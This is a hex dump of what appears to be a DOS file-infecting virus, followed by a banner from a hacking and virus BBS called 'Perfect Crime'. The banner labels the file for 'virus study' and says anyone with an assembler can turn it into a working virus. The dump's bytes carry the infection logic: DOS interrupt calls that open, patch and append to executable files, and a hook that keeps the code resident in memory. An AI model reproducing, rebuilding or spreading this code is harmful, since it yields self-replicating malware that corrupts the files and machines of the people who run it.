13B0:0730 00 8B D1 2E 8B 1E 0A 00-CD 21 72 EC 83 FA 00 75 .........!r....u
13B0:0740 E7 3D B6 04 76 E2 3D 93-F5 73 DD 2E A3 9E 04 2E .=..v.=..s......
13B0:0750 A1 0D 00 05 03 01 2E A3-A0 04 B8 02 42 B9 FF FF ............B...
13B0:0760 BA F8 FF 2E 8B 1E 0A 00-CD 21 72 BC 2E 8B 1E 0A .........!r.....
13B0:0770 00 0E 1F BA 0C 00 B9 08-00 B4 3F CD 21 72 A9 3D ..........?.!r.=
13B0:0780 08 00 75 A4 2E 81 3E 10-00 F4 7A 75 77 2E 83 3E ..u...>...zuw..>
13B0:0790 12 00 05 90 73 92 2E A1-0C 00 2E A3 9E 04 2E A1 ....s...........
13B0:07A0 0E 00 2E A3 A0 04 2D 03-01 2E A3 0C 00 B8 00 42 ......-........B
13B0:07B0 B9 00 00 BA 01 00 2E 8B-1E 0A 00 CD 21 72 5F B4 ............!r_.
13B0:07C0 40 0E 1F BA 0C 00 B9 02-00 CD 21 72 51 3D 02 00 @.........!rQ=..
13B0:07D0 75 4C 2E 8B 1E 0A 00 B4-45 CD 21 72 08 8B D8 B4 uL......E.!r....
13B0:07E0 3E CD 21 72 39 B8 00 42-B9 00 00 2E 8B 16 9E 04 >.!r9..B........
13B0:07F0 2E 8B 1E 0A 00 CD 21 72-25 B4 40 0E 1F B9 00 00 ......!r%.@.....
13B0:0800 CD 21 72 1A B8 00 42 B9-00 00 2E 8B 16 9E 04 83 .!r...B.........
13B0:0810 C2 0F 83 E2 F0 2E 8B 1E-0A 00 CD 21 73 03 EB 7A ...........!s..z
13B0:0820 90 2E 8B 1E 0A 00 8C CA-4A 8E DA BA 00 00 B9 B6 ........J.......
13B0:0830 04 B4 40 CD 21 72 E7 3D-B6 04 75 E2 2E 8B 1E 0A ..@.!r.=..u.....
13B0:0840 00 B4 45 CD 21 72 08 8B-D8 B4 3E CD 21 72 CF 2E ..E.!r....>.!r..
13B0:0850 C6 06 0C 00 E9 2E 8B 16-9E 04 83 C2 0F 83 E2 F0 ................
13B0:0860 83 EA 03 81 C2 AC 03 2E-89 16 0D 00 B8 00 42 B9 ..............B.
13B0:0870 00 00 8B D1 2E 8B 1E 0A-00 CD 21 72 A1 2E 8B 1E ..........!r....
13B0:0880 0A 00 0E 1F BA 0C 00 B9-03 00 B4 40 CD 21 72 8E ...........@.!r.
13B0:0890 3D 03 00 75 89 B8 07 0E-CD 10 B4 3E 2E 8B 1E 0A =..u.......>....
13B0:08A0 00 CD 21 B8 01 43 8E 5E-0E 8B 56 06 2E 8B 0E 08 ..!..C.^..V.....
13B0:08B0 00 CD 21 0E 1F BA 14 00-B4 10 CD 21 B8 24 25 2E ..!........!.$%.
13B0:08C0 C5 16 04 00 CD 21 58 5B-59 5A 5E 5F 5D 1F 07 9D .....!X[YZ^_]...
13B0:08D0 2E FF 2E 00 00 B8 02 42-B9 00 00 8B D1 2E 8B 1E .......B........
13B0:08E0 0A 00 CD 21 72 B4 83 FA-00 75 AF 3D B3 FD 73 AA ...!r....u.=..s.
13B0:08F0 2E A3 9E 04 2E A1 10 00-48 B1 09 D3 E0 2E 03 06 ........H.......
13B0:0900 0E 00 2E 3B 06 9E 04 75-91 2E 8B 1E 0A 00 B4 40 ...;...u.......@
13B0:0910 0E 1F BA 39 00 B9 84 00-CD 21 72 C8 3D 84 00 75 ...9.....!r.=..u
13B0:0920 E6 2E 8B 1E 0A 00 B4 45-CD 21 72 08 8B D8 B4 3E .......E.!r....>
13B0:0930 CD 21 72 B0 B8 00 42 B9-00 00 8B D1 2E 8B 1E 0A .!r...B.........
13B0:0940 00 CD 21 72 9F 2E C6 06-0C 00 E9 2E A1 9E 04 05 ..!r............
13B0:0950 11 00 2E A3 0D 00 2E 8B-1E 0A 00 B4 40 0E 1F BA ............@...
13B0:0960 0C 00 B9 03 00 CD 21 E9-30 FF 00 00 E8 00 00 5B ......!.0......[
13B0:0970 2E 89 47 FB B8 00 00 8E-C0 26 A1 C5 00 3D 7F 39 ..G......&...=.9
13B0:0980 75 08 26 A0 C7 00 3C 05-73 32 8B D4 2B D3 81 EA u.&...<.s2..+...
13B0:0990 6C 0B 72 28 BA C5 04 B1-04 D3 EA 2E 89 97 54 FC l.r(..........T.
13B0:09A0 8C D9 03 D1 8E C2 8B F3-81 C6 51 FC 8B FE B9 B6 ..........Q.....
13B0:09B0 04 FC F3 A4 06 E8 03 00-EB 13 90 CB 8C C8 8E D8 ................
13B0:09C0 8E C0 8E D0 2E 8B 47 FB-2E FF A7 01 01 BE 00 00 ......G.........
13B0:09D0 BF 00 00 8B CB 81 C1 61-FC 8C C2 4A 8E C2 8C DA .......a...J....
13B0:09E0 4A 8E DA 03 F1 4E 8B FE-FD F3 A4 FC 2E 8B 97 54 J....N.........T
13B0:09F0 FC 26 29 16 03 00 26 8C-0E 01 00 BF 00 00 8B F3 .&)...&.........
13B0:0A00 81 C6 51 FC B9 B6 04 1E-07 0E 1F F3 A4 26 83 2E ..Q..........&..
13B0:0A10 03 00 01 53 8C CB B4 50-CD 21 5B 2E 8C 0E 36 00 ...S...P.![...6.
13B0:0A20 2E 8B 16 2C 00 4A 8E C2-26 8C 0E 01 00 B8 21 35 ...,.J..&.....!5
13B0:0A30 53 CD 21 36 8C 06 02 00-36 89 1E 00 00 5B B8 21 S.!6....6....[.!
13B0:0A40 25 8C D2 8E DA BA C0 00-CD 21 B8 00 00 8E C0 26 %........!.....&
13B0:0A50 C7 06 C5 00 7F 39 26 C6-06 C7 00 05 8C C8 8E D8 .....9&.........
13B0:0A60 B4 1A BA 50 00 CD 21 2E-8B 47 FB E9 4E FF B7 04 ...P..!..G..N...
13B0:0A70 AC 05 F4 7A 05 00 00 00 ...z....
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;